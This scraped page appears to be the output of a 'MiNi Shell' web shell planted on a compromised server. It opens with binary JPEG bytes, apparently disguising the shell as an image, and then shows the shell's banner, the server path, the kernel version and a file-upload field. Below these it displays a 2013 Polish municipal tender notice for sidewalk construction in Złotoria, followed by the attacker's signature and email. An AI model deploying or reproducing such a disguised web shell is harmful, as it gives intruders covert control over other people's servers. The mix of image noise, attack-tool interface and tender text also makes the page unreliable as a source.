JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130322/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130322/43219-N-2013.html

<p class="kh_header"><b>Lubicz: budowa dwustronnego chodnika wzdłuż drogi gminnej Nr 100859 C - ul. Lipowa w Złotorii.</b><br>
<b>Numer ogłoszenia: 43219 - 2013; data zamieszczenia: 22.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg, Gospodarki Mieszkaniowej i Komunalnej w Lubiczu , ul. Toruńska 36A, 87-162 Lubicz, woj. kujawsko-pomorskie, tel. 56 6782709, faks 56 6782709.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lubicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> budowa dwustronnego chodnika wzdłuż drogi gminnej Nr 100859 C - ul. Lipowa w Złotorii..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1.Przedmiotem zamówienia jest wykonanie robót drogowych polegających na budowie dwustronnego chodnika  wzdłuż drogi gminnej Nr 100859 C - ul. Lipowa w Złotorii, na podstawie projektu budowlanego opracowanego przez Biuro Inżynierii Drogowej S.C. z Bydgoszczy. 
3.2.Podstawowe parametry chodnika:
3.2.1.Chodnik będzie wykonany obustronnie wzdłuż ul. Lipowej, na odcinku od skrzyżowania z drogą wojewódzką Nr 657 do skrzyżowania z drogą gminną, ul. Leśną. 
Łączna długość chodników 1 031,76 m, z czego 71,91 m w pasie drogi wojewódzkiej, a 959,85 m w pasie drogi gminnej.
3.2.2. Szerokość chodnika - 1,5 m oraz 2,0 m. W chodnik wpisane są zjazdy indywidualne na posesje, zjazdy publiczne w drogi gminne, perony przystankowe, miejsca postojowe dla samochodów.
3.2.3. Konstrukcja nawierzchni:
3.2.3.1. Chodnik - warstwa ścieralna z kostki betonowej szarej o grubości 6 cm, 
ułożonej na podsypce cementowo-piaskowej 1:4 o grubości 5 cm. Razem 11 cm.
3.2.3.2. Zjazdy indywidualne - warstwa ścieralna z kostki betonowej bordowej o 
grubości 8 cm, ułożonej na podsypce cementowo-piaskowej 1:4 o grubości 5 cm, na podbudowie zasadniczej z kruszywa łamanego, twardego, stabilizowanego mechanicznie o uziarnieniu 0-31,5 mm, o grubości 15 cm. Razem 28 cm.
3.2.3.3. Zjazdy publiczne i zatoki postojowe -  warstwa ścieralna z kostki betonowej bordowej o grubości 8 cm, ułożonej na podsypce betonowej z betonu klasy min. 
C 12/15 o grubości 10 cm, na podbudowie zasadniczej z kruszywa łamanego,     twardego, stabilizowanego mechanicznie o uziarnieniu 0-31,5 mm, o grubości 20 cm. Razem 38 cm.
3.2.3.4. Uzupełnienie nawierzchni na skrzyżowaniu Lipowa/Leśna - warstwa ścieralna 
z betonu asfaltowego AC11S o grubości 5 cm, ułożona na warstwie wiążącej 
z betonu asfaltowego AC22W o grubości 8 cm ułożonych na podbudowie pomocniczej w kruszywa łamanego, twardego, stabilizowanego mechanicznie o uziarnieniu 0-31,5 mm o grubości 20 cm. Razem 33 cm. 
3.2.3.5. Krawężniki i obrzeża - obramowanie istniejącej jezdni krawężnikiem 
betonowym 15x30 posadowionym na ławie betonowej 35x10 z oporem 15x15. 
Na zjazdach indywidualnych należy zastosować krawężniki wjazdowe 15x22   posadowione na ławie betonowej 35x10 z oporem 15x15, natomiast od strony posesji w zależności od typu zjazdu przewidziane są krawężniki wjazdowe lub oporniki  betonowe 12x25 posadowione na ławie betonowej 32x10 z oporem 15x15. Od strony posesji chodnik zakończony obrzeżem betonowym 8x30, ustawionym na podsypce cementowo-piaskowej o grubości 5 cm. 
3.2.3.6. Zestawienie krawężników i obrzeży:
3.2.3.6.1. Krawężnik 15x30 cm - 1 263,0 m.
3.2.3.6.2. Krawężnik łukowy R=2 m 15x30 cm - 16,0 m.
3.3.6.3. Krawężnik łukowy R=6 m 15x30 cm - 70,0 m.
3.2.3.6.4. Krawężnik łukowy R=8 m 15x30 cm - 20,0 m.
3.2.3.6.5. Krawężnik łukowy R=10 m 15x30 cm - 18,0 m.
3.2.3.6.6. Krawężnik wjazdowy 15x22 cm - 535,0 m.
3.2.3.6.7. Krawężnik skośny 15x22/30 cm - 80,0 m.
3.3.6.8. Krawężnik skośny 15x30/22 cm - 80,0 m.
3.2.3.6.9. Obrzeże betonowe 12x25 cm - 540,7 m.
3.2.3.6.10. Obrzeże betonowe 8x30 cm - 2 720,7 m.
3.2.3.7. Powierzchnia łączna 4 065,3 m2, z czego:
3.2.3.7.1. Nawierzchnia chodnika z kostki betonowej szarej 2 492,10 m2.  
3.2.3.7.2. Nawierzchnia zjazdów indywidualnych z kostki bordowej 1 308,90 m2.
3.2.3.7.3. Nawierzchnia zjazdów publicznych i zatok postojowych z kostki bordowej 236,90 m2.
3.2.3.7.4. Nawierzchnia chodnika z płyt betonowych ostrzegawczych 14,9 m2.
3.2.3.7.5. Nawierzchnia bitumiczna - uzupełnienie nawierzchni na skrzyżowaniu 
ul. Lipowej z Leśną 12,5 m2.
3.2.3.7.6. Humusowanie i obsiew trawą 2 717,0 m2.
3.2.4. W ramach robót wykonawca zrealizuje przebudowę/regulację wpustów ulicznych kanalizacji deszczowej, przebudowę/regulację studni wykonanej z prefabrykatów betonowych, wykonanie przepustu pod chodnikiem, przebudowę/regulację urządzeń obcych usytuowanych w pasie realizowanego chodnika, niezbędną wycinkę z wykarczowaniem karp usuniętych drzew kolidujących z realizowanym chodnikiem.
3.3.Wykonawca w celu prawidłowej realizacji niniejszego zamówienia zobowiązany jest również wykonać poniższe czynności, a tym samym uwzględnić je w proponowanej przez siebie cenie ofertowej:
3.3.1. Wykonanie zakresu robót wynikającego z projektu budowlanego.
3.3.2. Zapewnienie obsługi geodezyjnej przez uprawnione służby geodezyjne, obejmującej wytyczenie tras oraz dokumentację geodezyjną powykonawczą w czterech egzemplarzach.
3.3.3. Dokonania uzgodnień, uzyskania wszelkich wymaganych opinii niezbędnych do 
wykonania kompletnego dzieła i przekazania go do użytku.
3.3.4. Odpowiedniego zabezpieczenia terenu budowy.
3.3.5. Zapewnienia dozoru, a także właściwych warunków bezpieczeństwa i higieny pracy.
3.3.6. Prowadzenia robót zgodnie z przepisami bhp i ppoż.
3.3.7. Utrzymania terenu budowy w stanie wolnym od przeszkód komunikacyjnych oraz usuwania na bieżąco zbędnych materiałów, odpadów i śmieci.
3.3.8. Umożliwienia wstępu na teren budowy pracownikom organu nadzoru budowlanego i jednostek sprawujących funkcje kontrolne oraz upoważnionym przedstawicielom Zamawiającego.
3.3.9.Uporządkowania terenu budowy po zakończeniu robót, przywrócenia go do stanu pierwotnego i przekazania go Zamawiającemu  w terminie 14 dni od daty ostatecznego odbioru.
3.3.10. Zajęcie pasa drogowego jego oznakowanie na podstawie projektu czasowej organizacji ruchu,  jak   również koszt ewentualnych wypłat odszkodowań na rzecz osób trzecich.
3.3.11. Przeprowadzenia badań, prób, jak również dokonania odkrywek w przypadku nie zgłoszenia robót  zanikających do odbioru.
3.3.12. Naprawy uszkodzonych urządzeń uzbrojenia podziemnego.
3.3.13. Ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku 
z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej, na cały czas 
jej trwania.
3.4. Zamawiający nie przewiduje korekty ceny umownej ustalonej przez wybranego wykonawcę z tytułu robót dodatkowych lub innych mogących wystąpić w trakcie prowadzenia prac,których wykonanie będzie konieczne w celu wykonania zakresu rzeczowego zgodnie z technologią robót  i zabezpieczenia interesu osób trzecich. Zamawiający uznaje, że każdy wykonawca przeanalizuje zakres robót do wykonania wynikający z projektu budowlanego, z wizji terenowej i własnego doświadczenia i ewentualne ustalone przez niego prace dodatkowe, nie ujęte w przedmiarach bądź kosztorysach ślepych, uwzględni w proponowanej przez siebie cenie umownej.
3.5.Szczegółowe określenie przedmiotu zamówienia zostało ujęte w projekcie budowlanym i kosztorysie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.22-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o prowadzeniu działalności gospodarczej, wg wzoru stanowiącego.
Kserokopia uprawnień budowlanych odpowiadających przedmiotowi zamówienia dla osób zajmujących kierownicze stanowiska na budowie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o posiadaniu niezbędnej wiedzy i doświadczenia w zakresie prowadzonej działalności objętej przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz dysponowania odpowiednim sprzętem do realizacji robót</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz osób pełniących kierownicze funkcje na budowie o specjalności zgodnej z przedmiotem zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o znajdowaniu się w sytuacji ekonomicznej i finansowej zapewniającej prawidłowe wykonanie zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lubicz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg, Gospodarki Mieszkaniowej i Komunalnej w Lubiczu,  Lubicz Dolny  ul. Toruńska 36 A,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.04.2013 godzina 10:00, miejsce: Zarząd Dróg, Gospodarki Mieszkaniowej i Komunalnej w Lubiczu,  Lubicz Dolny  ul. Toruńska 36 A, pokój nr 2..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com